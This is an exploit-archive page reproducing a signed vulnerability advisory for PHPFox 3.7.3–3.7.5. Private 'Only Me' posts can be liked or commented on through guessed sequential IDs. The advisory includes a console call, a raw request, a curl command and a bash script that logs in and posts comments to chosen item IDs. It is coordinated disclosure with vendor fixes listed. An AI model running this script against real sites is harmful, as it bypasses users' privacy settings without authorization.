exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHPFox 3.7.5 Authorization Bypass

PHPFox 3.7.5 Authorization Bypass
Posted Apr 5, 2014
Authored by Wesley Henrique Leite

PHPFox version 3.7.3, 3.7.4, and 3.7.5 suffer from an authorization bypass vulnerability.

tags | exploit, bypass
advisories | CVE-2013-7195, CVE-2013-7196
SHA-256 | 84a321644bc5672cd3b2d3c2854da4b46721879da9583f0d746fbf2c378aa4e4

PHPFox 3.7.5 Authorization Bypass

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

CNA primary
MITRE Corporation ( cve-assign@mitre.org )


Software Vendors
PHPFox ( http://www.phpfox.com )
Product ( http://demo.phpfox.com )
Version: v3.7.3, v3.7.4 and v3.7.5

Research
Wesley Henrique Leite ( wesleyhenrique [\\NOSPAM**] gmail \\NOSPAM// com )


[+] INFORMATION
Vendor Notified : 2013-12-13
Vendor Homepage : www.phpfox.com

[+] CVEID
CVE-2013-7195
CVE-2013-7196

Released fix 2014-02-26:
[+] Flag as "like" a publication set to "Only Me"
Update to version v3.7.5
Released fix 2014-04-03:
[+] Comment on a publication set to "Only Me"
Update to version v3.7.6

Description of the problem:
[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)
[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)


[ + ] Flag as "like" a publication set to "Only Me" (v3.7.3 and v3.7.4)


Analyzing how the "comment" and "like" are added to a publication, it
was possible to manipulate them so that a publication set to "ONLY ME"
can receive an external comment or mark this as "like", not even having
any relationship with the user. The private publications "Only me" can
easily be discovered by analyzing the source of the page, since all
receive a unique identifier, to know these identifiers in the source
one can easily identify the holes in the sequence.


$Core.Like.Actions.doLike(0, 'user_status', 26, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 28, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 30, 0, this);
$Core.Like.Actions.doLike(0, 'user_status', 33, 0, this);


Unique ID Possible Privacy
26------------> public
27------------> removed or private
28------------> public
29------------> removed or private
30------------> public
31------------> removed or private
32------------> removed or private
33------------> public


this logic can be applied to other types of publications such as videos,
links and so on.


to exemplify, we will asume that the post with ID 27 is private "ONLY ME", and
to mark the publication with ID 27 as "like", just use the code below
in your browser console:


javascript console:
$Core.Like.Actions.doLike(0, 'user_status', 27, 0, this);


the account will be notified and will appear in the same publication
that was marked as "like" of the user who ran the code above.


The above problem can be found in version v3.7.3 and v3.7.4 all build.


[ + ] Comment on a publication set to "Only Me" (v3.7.3, v3.7.4 and v3.7.5)


following the logic above, we can identify possible private publications.
We'll get the ID 27 and add a comment, remembering that it is private "Only me".


these are variables of a comment.


&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7
&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&
val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&
core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290


Variables that can be manipulated.


val[text] -------> Text of comment
val[type] -------> user_status, photo, music_song, poll, link, blog
val[item_id] -------> Unique ID


to make the process more dynamic the script below was created.


$ curl 'http://demo.phpfox.com/static/ajax.php' \
'SET HERE COOKIE AND HEAD INFO FOR YOUR USER ACCOUNT' \
- --data '&core[ajax]=true&core[call]=comment.add&core[security_token]=686f82ec43f7dcd92784ab36ab5cbfb7&val[type]=user_status&val[item_id]=27&val[parent_id]=0&val[is_via_feed]=0&val[default_feed_value]=Write%20a%20comment...&val[text]=AQUI!!!!!!!!!!!&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290'

this information can also be manipulated directly in the console.

The above problem can be found in version v3.7.3, v3.7.4 and v3.7.5 all build.

################
# SCRIPT
################
#!/bin/bash

# This script was developed for demonstrat development team
# phpFox of the problem, can be easily adapted for testing
# other applications that use the framework, just by adjusting
# the variable "${TARGET}"
#
# Comments are published with the credentials defined on variables
#
# USERACCOUNT = "your_mail%40example.com"
# USERPASSWD = "your_password"
#
# even in the absence relationship between users or publication
# being set to "Only Me" in the case is the focus of this study,
# the review will be added.
#
# Wesley Henrique Leite
# wesleyhenrique **(A)** gmail **NOSPAM** com
# wesley **(A)** telapreta **NOSPAM** com **NOSPAM** br
#
# USAGE:
# $ comment_only-me.bash <user_status|photo|music_song|poll|link|blog>
777 'Hello all'
#

#AUTH
# encode
# @ = %40 -> teste%40example.com
USERACCOUNT=""
USERPASSWD=""
COOKIE=cookie.txt
SECTOKEN=""
TYPE="$1"
ITEM_ID=$2
MSG="$3"
TARGET="http://demo.phpfox.com"
URL_LOGIN="${TARGET}/user/login"
URL_AJAX="${TARGET}/static/ajax.php"
USER_AGENT="User-Agent: Mozilla/5.0 (X11; Linux x86_64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107
Safari/537.36"


USAGE="Type Item_id and MSG is required\n $0
<user_status|photo|music_song|poll|link|blog> 777 'Hello all' "

[ -z "${USERACCOUNT}" -o \
-z "${USERPASSWD}" ] && {
echo "Open $0 file and edit USERACCOUNT and USERPASSWD"
exit
}

[ $# -eq 3 -a \
! -z "${TYPE}" -a \
! -z "${ITEM_ID}" -a \
! -z "${MSG}" ] || { echo -e "${USAGE}" ; exit ; }

>${COOKIE}

# GET COOKIE AND SECURITY_TOKEN
SECTOKEN=$(curl -D ${COOKIE} ${TARGET} |
grep 'security_token' |
grep -Ewo '([a-f0-9A-F]){32}' |
sort -u)

# AUTH USER
# SAVE COOKIE
curl "${URL_LOGIN}" \
-b "${COOKIE}" \
-H "Origin: ${TARGET}" \
-H 'Accept-Encoding: gzip,deflate,sdch' \
-H 'Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.6,en;q=0.4' \
-H "${USER_AGENT}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
\
-H 'Cache-Control: max-age=0' \
-H 'Connection: keep-alive' \
-D ${COOKIE} \
--data "core%5Bsecurity_token%5D=${SECTOKEN}&val%5Blogin%5D=${USERACCOUNT}&val%5Bremember_me%5D=&val%5Bpassword%5D=${USERPASSWD}"
\
--compressed


### COMMENT ADD
curl "${URL_AJAX}" \
-b "${COOKIE}" \
-H "Origin: ${TARGET}" \
-H "${USER_AGENT}" \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H 'Accept: text/javascript, application/javascript,
application/ecmascript, application/x-ecmascript, */*; q=0.01' \
-H 'X-Requested-With: XMLHttpRequest' \
-H 'Connection: keep-alive' \
--data "&core[ajax]=true&core[call]=comment.add&core[security_token]=${SECTOKEN}&val[type]=${TYPE}&val[item_id]=${ITEM_ID}&val[parent_id]=0&val[is_via_feed]=${ITEM_ID}&val[default_feed_value]=Write%20a%20comment...&val[text]=${MSG}&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=290"
\
--compressed

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iF4EAREIAAYFAlM/lEEACgkQd9Htm4AVoW9ToAEAnnZogdYRlKCi3RDfJgkLvbK8
RIQcsz5fsiU9d3nrVKwBAIJFfcsdfVspUpExdtuEFgPJ7Sj7thHURfVHvFGSXvvj
=6hMg
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close